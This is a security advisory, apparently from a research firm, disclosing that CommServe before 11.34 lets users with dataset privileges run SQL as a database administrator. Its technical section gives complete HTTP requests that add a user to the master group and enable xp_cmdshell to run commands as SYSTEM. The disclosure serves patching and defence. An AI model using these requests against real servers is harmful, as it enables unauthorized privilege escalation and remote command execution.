Dangerous feature in Commvault CommServe < 11.34

07/03/2024 - Download

Product

Commvault CommServe

Severity

Medium

Fixed Version(s)

11.34

Affected Version(s)

< 11.34

CVE Number

N/A

Authors

Guillaume André

Hugo Clout

Description

Presentation

The CommServe server is the central management component of the CommCell environment. It coordinates and executes all CommCell operations, maintaining Microsoft SQL Server databases that contain all configuration, security, and operational history for the CommCell environment.

 

Issue(s)

Synacktiv discovered a vulnerability in Commvault CommServe versions before 11.34 allowing users with Add dataset and Query datasource privileges to interact with the CommServe database and impersonate the database owner. It allows these users to:

  • Elevate their privileges to master.
  • Execute remote commands on the CommServe server.

Timeline

Date Description
2023.02.07 Advisory sent to Commvault
2024.01.12 Version 11.34 released, which fixes the vulnerability
2024.03.07 Public release

 

Technical details

Description

Users with Add dataset and Query datasource privileges are allowed to execute arbitrary queries on the MS-SQL database of the CommServe server:
POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]

{
   "dataSet":[
      {
         "dataSet":{
            "dataSetName":"test",
            "dataSetGuid":"f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
            "originalDataSetName":""
         },
         "endpoint":"DATABASE",
         "databaseName":"CommServ",
         "GetOperation":{
            "sqlText":"select user_name();",
            "postQueryFilter":true
         },
         "dataSources":[
            {
               "connectionType":"COMMCELL",
               "commCell":{
                  "commCellName":"$LocalCommCell$"
               }
            }
         ],
         "originalQuery":""
      }
   ]
}

HTTP/1.1 200 
{[...]"recordsCount":1,"records":[ ["commvault","sqlexec_cv"]],[...]}
The previous response shows that the SQL request is executed as the sqlexec_cv user. The latter can impersonate the sqladmin_cv user, which has system administrator privileges on the database:
POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]

{
    "dataSet": [
        {
            "dataSet": {
                "dataSetName": "test",
                "dataSetGuid": "f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
                "originalDataSetName": ""
            },
            "endpoint": "DATABASE",
            "databaseName": "CommServ",
            "GetOperation": {
                "sqlText": "EXECUTE AS login = 'sqladmin_cv'; SELECT current_user, IS_SRVROLEMEMBER('sysadmin');",
                "postQueryFilter": true
            },
            "dataSources": [
                {
                    "connectionType": "COMMCELL",
                    "commCell": {
                        "commCellName": "$LocalCommCell$"
                    }
                }
            ],
            "originalQuery": ""
        }
    ]
}

HTTP/1.1 200 
{[...]"recordsCount": 1,"records": [["commvault","dbo",1]],[...]
}

 

Impact

Privilege escalation

By impersonating sqladmin_cv, it is possible to add any user to the master group.

First, the id of the user to be added to the master group can be retrieved from the UMUsers table:

POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]

{
    "dataSet": [
        {
            "dataSet": {
                "dataSetName": "test",
                "dataSetGuid": "f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
                "originalDataSetName": ""
            },
            "endpoint": "DATABASE",
            "databaseName": "CommServ",
            "GetOperation": {
                "sqlText": "SELECT id, login FROM UMUsers;",
                "postQueryFilter": true
            },
            "dataSources": [
                {
                    "connectionType": "COMMCELL",
                    "commCell": {
                        "commCellName": "$LocalCommCell$"
                    }
                }
            ],
            "originalQuery": ""
        }
    ]
}

HTTP/1.1 200 
["commvault",5,"user",
[...]]

A row is then added to the UmUserGroup table, to add the user user (id 5) to the master group (id 1):

POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]

{
    "dataSet": [
        {
            "dataSet": {
                "dataSetName": "test32",
                "dataSetGuid": "f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
                "originalDataSetName": ""
            },
            "endpoint": "DATABASE",
            "databaseName": "CommServ",
            "GetOperation": {
                "sqlText": "EXECUTE AS login = 'sqladmin_cv'; SET IDENTITY_INSERT UMUserGroup ON; INSERT INTO UMUserGroup(userId, groupId, flag, umUserGroupId) VALUES (5, 1, 0, 5);",
                "postQueryFilter": true
            },
            "dataSources": [
                {
                    "connectionType": "COMMCELL",
                    "commCell": { "commCellName": "$LocalCommCell$"
 }
                }
            ],
            "originalQuery": ""
        }
    ]
}

HTTP/1.1 200 
[...]

The user user is then a member of the master group:

User user added to the master group.

Remote command execution

By impersonating sqladmin_cv, it is possible to execute arbitrary commands on the CommServe server:

POST /webconsole/proxy/cr/reportsplusengine/datasets/test/select/ HTTP/1.1
Host: 192.168.56.210
Cookie: JSESSIONID=[...]
Content-Type: application/json
X-Csrf-Token: [...]

{
    "dataSet": [
        {
            "dataSet": {
                "dataSetName": "test",
                "dataSetGuid": "f2d42ed6-834a-4808-fbbb-49dd2a95dfdf",
                "originalDataSetName": ""
            },
            "endpoint": "DATABASE",
            "databaseName": "CommServ",
            "GetOperation": {
                "sqlText": "EXECUTE AS login = 'sqladmin_cv'; EXEC sp_configure 'show advanced options', '1'; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', '1'; RECONFIGURE; EXEC xp_cmdshell whoami;",
                "postQueryFilter": true
            },
            "dataSources": [
                {
                    "connectionType": "COMMCELL",
                    "commCell": {
                        "commCellName": "$LocalCommCell$"
                    }
                }
            ],
            "originalQuery": ""
        }
    ]
}

HTTP/1.1 200 
{[...]"recordsCount": 2,"records": [["commvault","nt authority\\system"],[...]
}